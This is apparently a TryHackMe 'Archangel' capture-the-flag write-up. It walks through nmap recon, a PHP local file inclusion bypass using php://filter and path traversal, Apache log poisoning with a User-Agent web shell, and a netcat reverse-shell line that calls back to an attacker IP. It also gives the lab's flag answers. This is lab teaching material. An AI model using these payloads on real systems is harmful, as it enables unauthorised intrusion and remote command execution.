> For the complete documentation index, see [llms.txt](https://kunalwalavalkar.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/easy/archangel.md).

# Archangel

## Task 1: Deploy the machine

## Task 2: Get a shell

### Question

> Find a different hostname

* Let's scan the target using `nmap`.

```
$ nmap -sC -sV 10.10.216.22
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-08 09:44 IST
Nmap scan report for 10.10.216.22
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wavefire
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.64 seconds
```

* As we can see there are three open ports:
  * Port 22: ssh
  * Port 80: http
* We can now visit the web page through our browser. !\[\[2 92.png]]
* The email address tells us what the other domain is.

### Answer

```
mafialive.thm
```

### Question

> Find flag 1

* Let's add `mafialive.thm` to our `/etc/hosts` file. !\[\[3 72.png]]
* We can now check if we can find something in `mafialive.thm`. !\[\[4 57.png]]

### Answer

```
thm{f0und_th3_r1ght_h0st_n4m3}
```

### Question

> Look for a page under development

* We can go to `/robots.txt` to see if any pages are disallowed. Those pages could be under development. !\[\[5 41.png]]
* Let's go to `/test.php`. !\[\[6 30.png]]

### Answer

```
test.php
```

### Question

> Find flag 2

* Let's try to read the source code of `/test.php`. !\[\[7 24.png]]
* Looks like we are not allowed to read the `/test.php` source code.
* We can use the `php://filter` to encode the source code to Base64 and bypass the security.

#### php\://filter

```
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
```

!\[\[8 20.png]]

* Let's decode the Base64 string.

```
$ echo "CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==" | base64 -d

<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if(isset($_GET["view"])){
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

                echo 'Sorry, Thats not allowed';
            }
        }
        ?>
    </div>
</body>

</html>
```

* The flag is in the comment.

### Answer

```
thm{explo1t1ng_lf1}
```

### Question

> Get a shell and find the user flag

* Let's take a closer look at the `test.php` code.

#### test.php

```php
<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if(isset($_GET["view"])){
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

                echo 'Sorry, Thats not allowed';
            }
        }
        ?>
    </div>
</body>

</html>
```

* We can see that it disallows the use of `../..`.
* Also, the URI must contain `/var/www/html/development_testing`.
* Using this information we can craft an exploit that gives the Apache `àccess.log` logs.

#### access.log

```
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//../log/apache2/access.log
```

!\[\[9 15.png]]

* Let's intercept the request using Burpsuite. !\[\[11 8.png]]
* We have to change the `User-Agent` field to the following:

```
<?php system($_GET['cmd']); ?>
```

!\[\[12 7.png]]

* We can now upload a PHP reverse shell to the server. Let's go to Revshells.

```
<?php exec(' nc 10.10.48.138 9999 -e /bin/bash'); ?>  
```

* Let's brute force the web pages using `gobuster`.

```
$ gobuster dir -u http://10.10.216.22 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.216.22
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/flags                (Status: 301) [Size: 312] [--> http://10.10.216.22/flags/]
/images               (Status: 301) [Size: 313] [--> http://10.10.216.22/images/]
/index.html           (Status: 200) [Size: 19188]
/layout               (Status: 301) [Size: 313] [--> http://10.10.216.22/layout/]
/pages                (Status: 301) [Size: 312] [--> http://10.10.216.22/pages/]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
```
